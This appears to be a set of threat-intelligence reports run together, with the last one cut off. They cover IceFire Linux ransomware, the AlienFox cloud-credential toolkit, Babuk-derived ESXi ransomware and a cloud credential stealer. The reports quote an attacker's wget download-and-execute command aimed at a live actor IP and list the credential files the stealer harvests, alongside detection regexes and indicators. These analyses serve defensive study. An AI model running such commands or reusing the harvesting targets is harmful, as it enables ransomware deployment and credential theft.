Executive Summary

• In recent weeks SentinelLabs observed novel Linux versions of IceFire ransomware being deployed within the enterprise network intrusions of several media and entertainment sector organizations worldwide.
• Currently observations indicate the attackers deployed the ransomware by exploiting CVE-2022-47986, a deserialization vulnerability in IBM Aspera Faspex file sharing software.
• The operators of the IceFire malware, who previously focused only on targeting Windows, have now expanded their focus to include Linux. This strategic shift is a significant move that aligns them with other ransomware groups who also target Linux systems.

Background

SentinelLabs recently observed a novel Linux version of the IceFire ransomware being deployed in mid February against enterprise networks. The iFire file extension is associated with known reports of IceFire, a ransomware family noted by MalwareHunterTeam in March 2022.

Another new ransomware just appeared: IceFire.
Note: iFire-readme.txt
Extension: .iFire
Already seen victim companies from multiple countries, including multiple victims from 1-1 countries in the past < 40 hours, so they started “hard” it seems…@demonslay335 pic.twitter.com/QfguAicNYO

— MalwareHunterTeam (@malwrhunterteam) March 14, 2022

Prior to this report, IceFire had only shown a Windows-centric focus. The attackers tactics are consistent with those of the ‘big-game hunting’ (BGH) ransomware families, which involve double extortion, targeting large enterprises, using numerous persistence mechanisms, and evading analysis by deleting log files. Previous reports indicate that IceFire targeted technology companies; SentinelLabs observed these recent attacks against organizations in the media and entertainment sector. IceFire has impacted victims in Turkey, Iran, Pakistan, and the United Arab Emirates, which are typically not a focus for organized ransomware actors.

Technical Analysis

The IceFire Linux version (SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973) is a 2.18 MB, 64-bit ELF binary compiled with gcc for AMD64 architecture. We tested the sample on Intel-based distributions of Ubuntu and Debian; IceFire ran successfully on both test systems.

In observed intrusions, the Linux version was deployed against CentOS hosts running a vulnerable version of IBM Aspera Faspex file server software. The system downloaded two payloads using wget and saves them to /opt/aspera/faspex:

sh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire && chmod +x demo && ./demo

On execution, files are encrypted and renamed with the “.ifire” extension appended to the file name. IceFire then deletes itself by removing the binary, which is evident in the picture below.

The “.iFire” extension is appended to the file name. IceFire skipped the files with “.sh” and “.cfg” extensions.

Excluded Files & Folders

The sample contains data segment references to a list of file extensions. These extensions are excluded from encryption, as they pertain to executables, application or system functionality. In the case of .txt and .pid, encrypting these files potentially impedes the ransomware functionality.

.cfg.o.sh.img.txt.xml.jar.pid.ini.pyc.a.so.run.env.cache.xmlb

The following file extensions are targeted for encryption:

.sample .pack .idx .bitmap .gzip .bundle .rev .war .7z .3ds .accdb .avhd .back .cer .ctl .cxx .dib .disk .dwg .fdb .jfif .jpe .kdbx .nrg .odc .odf .odg .odi .odm .odp .ora .ost .ova .ovf .p7b .p7c .pfx .pmf .ppt .qcow .rar .tar .tib .tiff .vbox .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vsdx .vsv .work .xvd .vswp .nvram .vmxf .vmem .vmsn .vmss .wps .cad .mp4 .wmv .rm .aif .pdf .doc .docx .eml .msg .mail .rtf .vbs .c .cpp .cs .pptx .xls .xlsx

IceFire ransomware doesn’t encrypt all files on Linux: it avoids encrypting certain paths, so that critical parts of the system are not encrypted and remain operational. In one observed infection, the /srv directory was encrypted, so these exclusions can be selectively overridden.

Folder	Description
/boot	Data used at startup
/dev	Device files, drivers
/etc	System configuration files
/lib	Shared libraries used by applications or system for dynamically-linked functionality
/proc	Virtual filesystem used by Linux to store runtime system information like PIDs, mounted drives, system configuration, etc.
/srv	Web server directories
/sys	Interface to the kernel; similar to /proc
/usr	User-level binaries and static data
/var	Dynamic data, e.g. caches, databases
/run	System information, including PID files; cleared on each reboot

During our analysis, the user profile directory at /home/[user_name]/ saw the most encryption activity. IceFire targets user and shared directories (e.g., /mnt, /media, /share) for encryption; these are unprotected parts of the file system that do not require elevated privileges to write or modify.

Interestingly, several file sharing clients downloaded benign encrypted files after IceFire had encrypted the file server’s shared folders. Despite the attack on the server, clients were still able to download files from the encrypted server. This implies the IceFire developer made thoughtful choices in the excluded paths and file extensions.

IceFire Linux Payload Delivery & Infrastructure

IceFire for Windows is delivered through phishing messages and pivoting using post-exploitation frameworks. The Linux variant is in its infancy, though our observations indicate it was deployed using an exploit for CVE-2022-47986, a recently patched vulnerability in IBM’s Aspera Faspex file sharing software.

IceFire payloads are hosted on a DigitalOcean droplet at 159.65.217.216 with the following URL format:

hxxp[://]159.65.217.216:8080/(subdomain.domain.TLD|IP_Address)/iFire

The following regular expression can be used to detect IceFire payload URLs. Consider wildcarding the Digital Ocean IP address in case the actors pivot to a new delivery IP or domain.

http:\/\/159\.65\.217\.216:8080\/(([a-z]+\.){2}([a-z]+)|^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4})\/iFire

Open-source intelligence platforms revealed a history of Aspera Faspex activity on IP address 159.65.217.216, including:

• Other payload URLs with “aspera” in the secondary hostname section of the URI
• Session cookie name: _aspera_faspex_session
• Service fingerprinting indexed a vulnerable version of Aspera Faspex software

Notable Findings

As of this writing, the IceFire binary was detected by 0/61 VirusTotal engines. Notably, this sample contains many statically linked functions from the legitimate OpenSSL library, contributing to the relatively large file size.

The binary contains the following hardcoded RSA public key:

-----BEGIN RSA PUBLIC KEY-----

MIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+\nZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w\nFadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0+EOItH/NRL1PpbkDPP\nc0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu+ihjLcIwNd4FsYS+Zw9OCH0gnE\nj6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK\ndvO6XAEBWx9cYMEk2oTvk50y8/U41+5GFQIDAQAB

-----END RSA PUBLIC KEY-----

In a cryptographic logging function, the binary contains an embedded path referencing the Desktop for a user named “Jhone.” The .cnf extension potentially refers to a configuration file. The relic was near the end of the OpenSSL functionality; it is possible that the OpenSSL package contained this artifact and is not necessarily the ransomware developer.

Ransom Notes

IceFire drops the ransom note from an embedded resource in the binary and writes it to each directory targeted for file encryption. The ransom note contains a hardcoded username and password that are required to log into the ransom payment portal hosted on a Tor hidden service at 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd[.]onion.

The Linux version’s Onion hostname matches the hostname that ransomware trackers tie to IceFire, including attacks targeting Windows.

Conclusion

This evolution for IceFire fortifies that ransomware targeting Linux continues to grow in popularity through 2023. While the groundwork was laid in 2021, the Linux ransomware trend accelerated in 2022 when illustrious groups added Linux encryptors to their arsenal, including the likes of  BlackBasta, Hive, Qilin, Vice Society aka HelloKitty, and others.

In comparison to Windows, Linux is more difficult to deploy ransomware against–particularly at scale. Many Linux systems are servers: typical infection vectors like phishing or drive-by download are less effective. To overcome this, actors turn to exploiting application vulnerabilities, as the IceFire operator demonstrated by deploying payloads through an IBM Aspera vulnerability.

Indicators of Compromise

SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973

Payload URLs: hxxp[://]159.65.217.216:8080/demo

Executive Summary

• SentinelLabs analyzed several iterations of “AlienFox,” a comprehensive toolset for harvesting credentials for multiple cloud service providers.
• Attackers use AlienFox to harvest API keys & secrets from popular services including AWS SES & Microsoft Office 365.
• AlienFox is a modular toolset primarily distributed on Telegram in the form of source code archives. Some modules are available on GitHub for any would-be attacker to adopt.
• The spread of AlienFox represents an unreported trend towards attacking more minimal cloud services, unsuitable for cryptomining, in order to enable and expand subsequent campaigns.
• Along with our thorough analysis of different AlienFox iterations, we provide a full list of indicators of compromise, YARA rules, and recommendations in the full report.

Overview

SentinelLabs has identified a new toolkit dubbed AlienFox that attackers are using to compromise email and web hosting services. AlienFox is highly modular and evolves regularly. Most of the tools are open-source, meaning that actors can readily adapt and modify to suit their needs. Many developers take credit on different iterations of the tools. The evolution of recurring features suggests the developers are becoming increasingly sophisticated, with performance considerations at the forefront in more recent versions.

Actors use AlienFox to collect lists of misconfigured hosts from security scanning platforms, including LeakIX and SecurityTrails. They use multiple scripts in the toolset to extract sensitive information such as API keys and secrets from configuration files exposed on victims’ web servers.

Later versions of the toolset added scripts that automate malicious actions using the stolen credentials, including:

• Establishing Amazon Web Services (AWS) account persistence and privilege escalation
• Collecting send quotas and automating spam campaigns through victim accounts or services

SentinelLabs’ full report provides more details of AlienFox distribution and targeting, along with a detailed analysis of the entire toolset. A comprehensive list of Indicators of Compromise can also be found there.

Read the Full Report

Targeting

AlienFox is a framework of tools that target a variety of web services, though the overarching theme for the toolset is cloud-based and software-as-a-service (SaaS) email hosting services.

Current observations indicate that AlienFox targeting is primarily opportunistic. The actors rely on server misconfigurations associated with popular web frameworks, including Laravel, Drupal, Joomla, Magento, Opencart, Prestashop, and WordPress. The toolsets contain scripts designed to check for the aforementioned services; each script requires a list of targets read from a text file. These ‘target’ files are generated by a separate script, such as grabip.py and grabsite.py. The target generation scripts use a combination of brute force for IPs and subnets, as well as web APIs for open-source intelligence platforms to provide details about potential targets. We observed scripts leveraging the SecurityTrails and LeakIX platforms’ API.

When a susceptible server is identified, the actor parses exposed environment or configuration files that store sensitive information, such as services enabled and the associated API keys and secrets. We found scripts targeting tokens and secrets from:

• 1and1
• AWS
• Bluemail
• Exotel
• Google Workspace
• Mailgun
• Mandrill
• Nexmo
• Office365
• OneSignal
• Plivo
• Sendgrid
• Sendinblue
• Sparkpostmail
• Tokbox
• Twilio
• Zimbra
• Zoho

Versioning

The tool techniques and how they are organized varies across versions. To date, we have identified AlienFox versions 2 through 4, which date from February 2022 onward. Several scripts we analyzed have been summarized by other researchers as malware families Androxgh0st and GreenBot (aka Maintance). As these researchers noted, the scripts are readily available in open sources including GitHub, which lends to constant adaptation and variation in the wild.

AlienFox V2

The oldest of the known AlienFox toolsets, Version 2 focuses primarily on extracting credentials from web server configuration or environment files. The archive we analyzed contains output from when an actor ran the tools, which included AWS access & secret keys. In this version of the AlienFox toolset, the core utility is housed in a script named s3lr.py, which is similar to env.py outlined in later versions.

Version 2 contains awses.py, a script that uses the AWS SDK Boto3 Python client to automate activities related to AWS Simple Email Service (SES), including sending & receiving messages and applying an elevated privilege persistence profile to the AWS account.

Additionally, Version 2 contains ssh-smtp.py, which parses configuration files for credentials and uses the Paramiko Python library to validate SSH configurations on the targeted web server. This script also contains encoded commands that potentially target CVE-2022-31279, a rejected Laravel PHP Framework deserialization vulnerability.

A more complete analysis of AlienFox v2 can be found in the full report.

AlienFox V3.x

Of the three known major versions of AlienFox, we identified the most unique archives labeled as Version 3. We observed the following name variations and respective file creation dates:

• ALIEN-FOX AFV 3.0 Izmir – February 2022
• ALIENFOX III V3.0 AFV.EXE – February 2022
• ALIEN-FOX AFV 3.5 JAGAUR – April 2022
• ALIEN-FOX AFV 3.5 rondrickmadeit – February 2022

Version 3.x contained the first observed version of the script Lar.py, which automates extraction of keys and secrets from compromised Laravel .env files and logs the results to a text file along with the targeted server details. Lar.py was uploaded to VirusTotal along with the script’s output, providing us a glimpse into its utility to threat actors.

It is worth noting that each of the SES-abusing toolsets we analyzed targets servers using the Laravel PHP framework, which could indicate that Laravel is particularly susceptible to misconfigurations or exposures.

Lar.py is coded in a more mature way than the AlienFox Version 2 scripts and their derivatives. Lar.py applies threading, Python classes with modular functions, and initialization variables. The author also adds tags to the stolen data output that logs whether the data was harvested using a configuration parser (.env method) or through a regular expression (debug method), which demonstrates an awareness of efficacy metrics.

AlienFoxV4

The most recent of the known toolsets, this set is organized much differently, with each tool assigned a numerical identifier (e.g., Tool1, Tool2). There is a core script in the AlienFox root directory named ALIENFOXV4.py that serves as a bootstrap for the numbered tool scripts in the child folders.

Tools 5, 6, 7, & 8 collect lists of targets and others check if the targets are misconfigured or exposed. For example, Tool17 contains cms.py, a script that checks sites for the presence of WordPress, Joomla, Drupal, Prestashop, Magento, Opencart. Tool13 contains similar AWS and SES-centric functionality seen in Version 2’s BTC.py.

While the aforementioned tools are well aligned with the older versions of AlienFox, several new additions suggest the developer is expanding the audience for the toolset or potentially to augment capabilities of the toolset’s existing customer base. For example, Tool16 is an Amazon.com retail site account checker that checks if an email address is already associated with an Amazon account; if not, the script creates a new Amazon account using the email address.

Additionally, Tools 19 (BTC.py) and 20 (ETH.py) automate cryptocurrency wallet seeds for Bitcoin and Ethereum, respectively. Despite the current functionality, the internal name for the last two tools says the scripts are a “Wallet Cracker.”

We explore the tools mentioned above in greater detail in the full report.

Recommendations

To defend against AlienFox tools, organizations should use configuration management best practices and adhere to the principle of least privilege. Consider using a Cloud Workload Protection Platform (CWPP) on virtual machines and containers to detect interactive activity with the OS.

Because activities like brute-force or password spray attempts may not be logged by certain service providers, we recommend monitoring for follow-on actions, including the creation of new accounts or service profiles–particularly those with high privilege. Additionally, consider monitoring for newly added email addresses in platforms where your organization conducts email campaigns.

Conclusion

The AlienFox toolset demonstrates another stage in the evolution of cybercrime in the cloud. Cloud services have well-documented, powerful APIs, enabling developers of all skill levels to readily write tooling for the service. The toolset has gradually improved through improved coding practices as well as the addition of new modules and capabilities.

Opportunistic cloud attacks are no longer confined to cryptomining: AlienFox tools facilitate attacks on minimal services that lack the resources needed for mining. By analyzing the tools and tool output, we found that actors use AlienFox to identify and collect service credentials from misconfigured or exposed services. For victims, compromise can lead to additional service costs, loss in customer trust, and remediation costs.

Indicators of Compromise

A comprehensive list of IoCS appears in the full report.

Read the Full Report

Executive Summary

• SentinelLabs identified 10 ransomware families using VMware ESXi lockers based on the 2021 Babuk source code leaks.
• These variants emerged through H2 2022 and H1 2023, which shows an increasing trend of Babuk source code adoption.
• Leaked source code enables actors to target Linux systems when they may otherwise lack expertise to build a working program.
• Source code leaks further complicate attribution, as more actors will adopt the tools.

Background

Throughout early 2023, SentinelLabs observed an increase in VMware ESXi ransomware based on Babuk (aka Babak, Babyk). The Babuk leaks in September 2021 provided unprecedented insight into the development operations of an organized ransomware group.

Due to the prevalence of ESXi in on-prem and hybrid enterprise networks, these hypervisors are valuable targets for ransomware. Over the past two years, organized ransomware groups adopted Linux lockers, including ALPHV, Black Basta, Conti, Lockbit, and REvil. These groups focus on ESXi before other Linux variants, leveraging built-in tools for the ESXi hypervisor to kill guest machines, then encrypt crucial hypervisor files.

We identified overlap between the leaked Babuk source code and ESXi lockers attributed to Conti and REvil, with iterations of the latter sharply resembling one another. We also compared them to the leaked Conti Windows locker source code, finding shared, bespoke function names and features.

In addition to these notorious groups, we also found smaller ransomware operations using the Babuk source code to generate more recognizable ESXi lockers. Ransom House’s Mario and a previously undocumented ESXi version of Play Ransomware comprise a small handful of the growing Babuk-descended ESXi locker landscape.

Babuk Background

Babuk was one of the early players in the ESXi ransomware space. The group’s longevity was crippled in 2021 when a Babuk developer leaked the builder source code for Babuk’s C++-based Linux Executable & Linkable Format (ELF) ESXi, Golang-based Network Attached Storage (NAS), and C++-based Windows ransomware tooling.

Through early 2022, there were few indications that actors had adapted the leaked Babuk source code, aside from a short-lived ‘Babuk 2.0’ variant and the occasional new Windows ransomware du jour. As cybercrime research is often laser-focused on Windows, Linux trends can develop under the radar.

SentinelLabs identified Babuk-descended ransomware through the string Doesn’t encrypted files: %d\n in the source code’s /бабак/esxi/enc/main.cpp.

The Babuk builder specifies a file name for the newly generated binary, e_esxi.out. Several samples we identified share a similar naming convention:

Ransomware Family	File Name
Mario	emario.out
Play	e_esxi.out
Babuk 2023 aka XVGV	RansomWare-e_esxi-XVGV2.out

For encryption, ESXi Babuk uses an implementation of the Sosemanuk stream cipher to encrypt targeted files, in contrast with Babuk for Windows, which uses the HC-128 cipher. Both ESXi and Windows Babuk use Curve25519-Donna to generate the encryption key.

Generations of Babuk

Comparison Methodology

SentinelLabs compiled an unstripped Babuk binary to establish a baseline of how Babuk looks and behaves, referred to henceforth as ‘Baseline Babuk.’ To understand whether the variants we identified are related to Babuk, we compared each variant to this Baseline Babuk sample and highlighted notable similarities and differences.

Babuk 2023 (.XVGV)

SHA1: e8bb26f62983055cfb602aa39a89998e8f512466

XVGV, aka Babuk 2023, emerged in March 2023 on Bleeping Computer’s forum as highlighted by @malwrhunterteam. Baseline Babuk and XVGV share code derived from main.cpp, argument processing functions from args.cpp, and encryption implementation.

Like Babuk, XVGV requires the operator to provide a directory to encrypt as an argument. During dynamic analysis, we provided the test system’s user directory. On the first run, the sample generated a ransom note, HowToRestore.txt, in all child directories.

However, only six files were encrypted, each with either .log or .gz file extensions. Looking at the file extension inclusions reveals why the damage was limited: XVGV targets VMware-centric files and excludes those which do not match a designated list. This is a behavior shared with Baseline Babuk, though the XVGV author added more file extensions.

Play (.FinDom)

SHA1: dc8b9bc46f1d23779d3835f2b3648c21f4cf6151

This file references the file extension .FinDom, as well as the ransom email address [email protected], which are artifacts associated with Play Ransomware. This is the first known version of Play built for a Linux system, which aligns this actor with the trend of ransomware groups increasingly targeting Linux. Play contains the same file searching functionality as Baseline Babuk; it also implements encryption using Sosemanuk.

The Play binary was submitted to VirusTotal as part of an archive (SHA1: 9290478cda302b9535702af3a1dada25818ad9ce) containing various hack tools and utilities–including AnyDesk, NetCat, a privilege escalation batch file, and encoded PowerShell Empire scripts–which are associated with ransomware group techniques after achieving initial access.

Mario (.emario)

SHA1: 048b3942c715c6bff15c94cdc0bb4414dbab9e07

Mario ransomware is operated by Ransom House, a group that emerged in 2021. Ransom House initially claimed that they target vulnerable networks to steal data without encrypting files. However, the group has since adopted cryptographic lockers.

The samples share a very similar find_files_recursive function, including the default ransom note filename How To Restore Your Files.txt. The encryption functions are also the same.

The verbose ransom note content is the most unique part of Mario’s ESXi locker. The Ransom House actors provide very explicit instructions to the victim explaining what to do and how to contact the actors.

Conti POC (.conti)

Conti POC – SHA1: 091f4bddea8bf443bc8703730f15b21f7ccf00e9
Conti ESXi Locker – SHA1: ee827023780964574f28c6ba333d800b73eae5c4

To our surprise, the Babuk hunt identified several binaries internally called ‘Conti POC,’ likely short for ‘proof of concept,’ which were documented in a September 2022 campaign against entities in Mexico.

Conti was a notoriously well-organized and ruthless ransomware group. Leaks revealed Conti’s organizational structure resembles many legitimate companies more than a criminal enterprise: the operation employed middle management and a human resources department. Chat history leaks circa early 2021 revealed that Conti had trouble getting their ESXi locker to work.

We compared several iterations of Conti and Babuk to assess a connection. Conti ESXi emerged in April 2022, which could mean that Conti implemented Babuk code after it was leaked in September 2021 and ultimately got the locker to work.

• Conti POC & Conti ESXi Locker: The Conti POC is less mature, which aligns with being a ‘proof of concept.’ Conti POC and Conti ESXi share many function names and behaviors, including the same argument processing functions and conditions. We conclude these samples are related, and that Conti POC is a likely predecessor to Conti’s ESXi locker.

  

• Conti POC & Baseline Babuk: The Conti POC SearchFiles and Baseline Babuk find_files_recursive functions are remarkably similar, containing the same file status variable names. Conti ported certain parts of this function to other local modules, demonstrating more maturity than Baseline Babuk. These two also share a similar main function, suggesting these families are also related and that Conti POC is a more mature evolution of Baseline Babuk.

  

• Comparing to Conti Leaked Windows Code: There are considerable overlaps in utility as well as function names between both Linux versions of Conti (POC and ESXi) and the leaked Windows Conti code. Both versions use the same open-source ChaCha encryption implementation. The leaked Conti Windows code contains commented-out references to HandleCommandLine, a function seen in the other Conti variants we analyzed, and several shared arguments to parse, such as prockiller. It is possible that a developer aligned function names between the Windows version and the ESXi locker in aspiration of feature parity.

  

REvil aka Revix (.rhkrc)

RHKRC – SHA1: 74e4b2f7abf9dbd376372c9b05b26b02c2872e4b
Revix June 2021 – SHA1: 29f16c046a344e0d0adfea80d5d7958d6b6b8cfa

We identified a Babuk-like sample internally called RHKRC, which appends the .rhkrc extension to filenames, a behavior associated with the REvil group’s “Revix” ESXi locker. Interestingly, reports of Revix in-the-wild date back to June 2021, which predates the September 2021 Babuk source code leaks.

To understand where this fits in the development timeline, we compared several iterations of related activity:

• RHKRC & Conti POC: Surprisingly similar, these versions both implement encryption identically through ChaCha20 as outlined above. They share a nearly identical, otherwise unique InitializeEncryptor function. These samples are related.

  

  

• RHKRC & Baseline Babuk: These samples share many function names, including Babuk’s native thread pooling. However, RHKRC implements encryption differently, and it has more bespoke ESXi CLI activity. We assess that these samples are related, though RHKRC is more mature despite also being in the ‘proof of concept’ stage.

• RHKRC & June 2021 Revix: We compared RHKRC with Revix from June 2021 in-the-wild activity. Revix is much more mature and contains dynamic code deobfuscation measures unseen in other variants analyzed. RHKRC and Revix share the same internal filename (elf.exe), ransom note name, and appended file extension. However, these similarities are mainly cosmetic, and we are unable to conclude if a definitive connection exists. Any theories about these coincidences amounts to conjecture.

Honorable Mention

SentinelLabs notes there are several other known families descended from the Babuk ESXi source code, including:

• Cylance ransomware (unrelated to the security company of the same name)
• Dataf Locker
• Rorschach aka BabLock
• Lock4
• RTM Locker (per Uptycs)

While there are undoubtedly more Babuk offspring that slipped under the radar, there are other unique ESXi ransomware families. A cursory glance at ALPHV, BlackBasta, Hive, and Lockbit’s ESXi lockers shows no obvious similarity to Babuk.

Babuk is occasionally blamed in error, too. Reports on the February ESXiArgs campaign–which briefly devastated some unpatched cloud services–claim the eponymous locker is derived from Babuk. However, our analysis found little similarity between ESXiArgs (SHA1: f25846f8cda8b0460e1db02ba6d3836ad3721f62) and Babuk. The only noteworthy similarity is the use of the same open-source Sosemanuk encryption implementation. The main function is entirely different, as shown below. ESXiArgs also uses an external shell script to search files and provide arguments to the esxcli, so there is no native find_files_recursive function to compare.

Conclusion

SentinelLabs’ analysis identified unexpected connections between ESXi ransomware families, exposing likely relationships between Babuk and more illustrious operations like Conti and REvil. While ties to REvil remain tentative, the possibility exists that these groups–Babuk, Conti, and REvil–potentially outsourced an ESXi locker project to the same developer. The talent pool for Linux malware developers is surely much smaller in ransomware development circles, which have historically held demonstrable expertise in crafting elegant Windows malware. Ransomware groups have experienced numerous leaks, so it is plausible smaller leaks occurred within these circles. Additionally, actors may share code to collaborate, similar to open-sourcing a development project.

There is a noticeable trend that actors increasingly use the Babuk builder to develop ESXi and Linux ransomware. This is particularly evident when used by actors with fewer resources, as these actors are less likely to significantly modify the Babuk source code.

Based on the popularity of Babuk’s ESXi locker code, actors may also turn to the group’s Go-based NAS locker. Golang remains a niche choice for many actors, but it continues to increase in popularity. The targeted NAS systems are also based on Linux. While the NAS locker is less complex, the code is clear and legible, which could make ransomware more accessible for developers who are familiar with Go or similar programming languages.

Indicators of Compromise

Ransomware Family	SHA1
Baseline Babuk (.babyk)	b93d649e73c21efea10d4d811b711316206c0509
Babuk Leaks Binary – d_esxi.out	cd19c2741261de97e91943148ba8c0863567b461
Babuk Leaks Binary – e_esxi.out	885a734c7869b52aa125674cb430199b2645cda0
Babuk 2023 (.XVGV)	e8bb26f62983055cfb602aa39a89998e8f512466
Play ESXi (.FinDom)	dc8b9bc46f1d23779d3835f2b3648c21f4cf6151
Play ESXi Compressed Parent	9290478cda302b9535702af3a1dada25818ad9ce
Rorschach aka Bablock (.slpqne)	76fb0d08fd5b9c52cb9da118ce5561cc0462555f
Mario (.emario)	048b3942c715c6bff15c94cdc0bb4414dbab9e07
Conti POC (.conti)	091f4bddea8bf443bc8703730f15b21f7ccf00e9
Conti ESXi (.conti)	ee827023780964574f28c6ba333d800b73eae5c4
RHKRC (.rhkrc)	74e4b2f7abf9dbd376372c9b05b26b02c2872e4b
RHKRC (.rhkrc)	29f16c046a344e0d0adfea80d5d7958d6b6b8cfa
Cylance Ransomware (.cylance)	933ad0a7d9db57b92144840d838f7b10356c7e51
Dataf Locker (.dataf)	71ed640ebd8377f52bda4968398c62c97ae1c3ed
Lock4 Ransomware (.lock4)	3b1a2847e006007626ced901e402f1a33bb800c7

By Alex Delamotte, with Ian Ahl (Permiso) and Daniel Bohannon (Permiso)

Executive Summary

• Throughout June 2023, an actor behind a cloud credentials stealing campaign has expanded their tooling to target Azure and Google Cloud Platform (GCP) services. Previously, this actor focused exclusively on Amazon Web Services (AWS) credentials.
• Cloud service credentials are increasingly targeted as actors find more ways to profit from compromising such services. This actor targeted exposed Docker instances to deploy a worm-like propagation module.
• These campaigns share similarity with tools attributed to the notorious TeamTNT cryptojacking crew. However, attribution remains challenging with script-based tools, as anyone can adapt the code for their own use.

Background

In December 2022, the threat research team at Permiso Security reported about a cloud credential stealer campaign that primarily targeted Amazon Web Services (AWS) credentials from public-facing Jupyter Notebooks services. The actors likely accessed these impacted services through unpatched web application vulnerabilities.

From June 14, 2023 through the end of the month, we worked with the Permiso team to track and analyze files related to a new incarnation of this campaign targeting exposed Docker services. The hallmark shell scripts remain the core of these campaigns, though we also identified an Executable and Linkable Format (ELF) binary written in Golang. The research team at Aqua also recently reported elements they observed from these actors’ abuse of Docker images.

SentinelLabs thanks the Permiso Security research team for their collaboration on the research in this report. The Permiso team released a blog about this campaign, which can be found here.

Tooling Updates

Since the December campaign, the actor has made several updates to how their tooling works.

Script Functionality

The December campaign targeted AWS credentials; the most recent campaigns added functions that target credentials from Azure and GCP. The actor actively modified these features as the campaigns evolved throughout June: Initially, a script aws.sh contained references to Azure credentials, but the relevant function was not called. A week later, samples emerged where the Azure credential functions were called.

The actor stored the generic credentials in an array labeled CRED_FILE_NAMES. The AWS-specific array from the original script ACF has been replaced with AWS_CREDS_FILES. We dive into this in more detail in the next section. There are also two new cloud service provider (CSP)-specific credentials variables: GCLOUD_CREDS_FILES and AZURE_CREDS_FILES.

The actor made the script more modular as it grew larger and more complex. The AWS functionality is now split into three smaller functions that are driven by the run_aws_grabber function only if the system is identified as AWS. This increases the efficiency of the script by running AWS commands only on AWS systems, which also enhances the script’s stealth.

Infrastructure

The actor no longer hosts files in an open directory, which complicates efforts to track and analyze these campaigns. Instead, C2 activity relies on a hardcoded username and password combination that are passed as arguments to the curl command.

The older campaign infrastructure was hosted on a Netherlands-based IP associated with Nice IT Services. The attacker has since moved infrastructure to AnonDns, a dynamic domain name service (DDNS) provider. The campaigns through June 2023 use one of several AnonDNS subdomains:

everlost.anondns.net
silentbob.anondns.net
ap-northeast-1.compute.internal.anondns.net

Credentials Collection

The newer versions target credentials in newly added arrays GCLOUD_CREDS_FILES and AZURE_CREDS_FILES. The versions emerging the week of 6/26/2023 added .env and docker-compose.yaml; the version from 6/15/2023 has env without the period, so the actor is apparently updating the tool to be more effective in the newest campaign. The newest campaign also has a new variable, MIXED_CREDFILES which contains only redis.conf.

The newer versions omitted the following credentials files that were present in the December campaign’s ACF:

cloud
.npmrc
credentials.gpg

The credentials collection logic in the new campaign’s samples targets the following services & technologies:

Technology	Targeted File
Amazon Web Services	.boto, .passwd-s3fs, .s3b_config, .s3backer_passwd, .s3cfg, credentials, s3proxy.conf
Azure	azure.json
Google Cloud Platform	.feature_flags_config.yaml, .last_opt_in_prompt.yaml, .last_survey_prompt.yaml, .last_update_check.json, access_tokens.db, active_config, adc.json, config_default, config_sentinel, credentials.db, gce
Censys	censys.cfg
Docker	docker-compose.yaml
Filezilla	filezilla.xml, recentservers.xml, queue.sqlite3
Git	.git-credentials
Grafana	grafana.ini
Kubernetes	clusters.conf, kubeconfig, secrets
Linux OS	.netrc, netrc
Ngrok	ngrok.yml
PostgresQL	.pgpass, postgresUser.txt, postgresPassword.txt
Redis	redis.conf
S3QL	authinfo2
Server Message Block (SMB)	.smbclient.conf, .smbcredentials, .samba_credentials
Uncategorized	.env, accounts.xml, api_key, resource.cache, servlist.conf

There is considerable overlap in the targeted files between these credential stealer campaigns and the TeamTNT Kubelet-targeting campaign reported by Sysdig in October 2022.

The script uses the cred_files function to search for credentials files on the system, write them to a temporary file $EDIS, copy the new file to a master credential-holding file $CSOF, then delete the temporary file. The $EDIS and $CSOF variable file names and paths are randomly generated via the special use Bash variable $RANDOM, meaning the value is an integer between 0 and 32767 that changes each time $RANDOM is accessed.

AWS

The new scripts show more attention to making the features modular, a natural evolution as a script becomes more complex. The AWS-specific functionality is driven by a function named run_aws_grabber. Most AWS-centric features from the December campaign have been rolled into one of four functions driven by run_aws_grabber:

• get_aws_infos: Queries the AWS instance metadata service (IMDS) for IAM configuration and sets the output to $AWS_INFO, as well as security credential configuration from EC2 and IAM resources, which are set to $AWS_1_EC2 and $AWS_1_IAM_NAME, respectively.
• get_aws_meta: Writes the values from each of the variables generated in get_aws_infos then parses the data for specific values via grep and extracts them using sed, writing the output to the $CSOF variable.
• get_aws_env: Checks for values in AWS credential related variables, writes them to $CSOF when present. When the $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is found, the function calls curl against the URL, then modifies the response using sed to format specific values into an aws configure set command. For example, the string AccessKeyId in the response is transformed to aws configure set aws_access_key_id. The actor likely chose to format the values as a command so that the output feeds into additional automated actions.

• get_awscli_data: This function is only implemented in the two most recent versions: the function exists in the 6/15/2023 version of aws.sh, but it is not called. The function invokes aws sts get-caller-identity to collect the 12-digit AWS account identifier and writes the result to $CSOF.

Azure & GCP

A notable recent addition is logic specific to the Azure and Google Cloud platforms. The get_azure and get_google functions are implemented in the newest versions seen on 06/26/2023; the logic was present in the 6/15 campaign, but the functions were not called. These changes indicate that these features are being actively developed, so we expect more changes as the actors roll out and test these features.

System Profiling

The attackers now perform system profiling through the aws.sh scripts as well as other scripts delivered under certain conditions. Another new feature is the get_docker function, which checks if the environment is a Docker container. When it is, the function runs docker inspect against each running container and saves the result to $CSOF. The output will not necessarily have credentials and this likely serves as a mechanism for system profiling.

Additionally, the new version added the function get_prov_vars, which calls cat /proc/*/env* to collect environment variable details from each running process and writes the result to $CSOF. The actor likely does this to enumerate other valuable services running on the system for manual targeting.

We also observed profiling activity from Data.sh, a post-exploitation script that collects details from the system and sends it to the attacker’s server. The script uses Bash to craft a web request to download the curl binary from the attacker’s server through the bashload function. This is notable because attacks against minimal systems–such as containers–can be limited by the absence of ubiquitous binaries like curl.

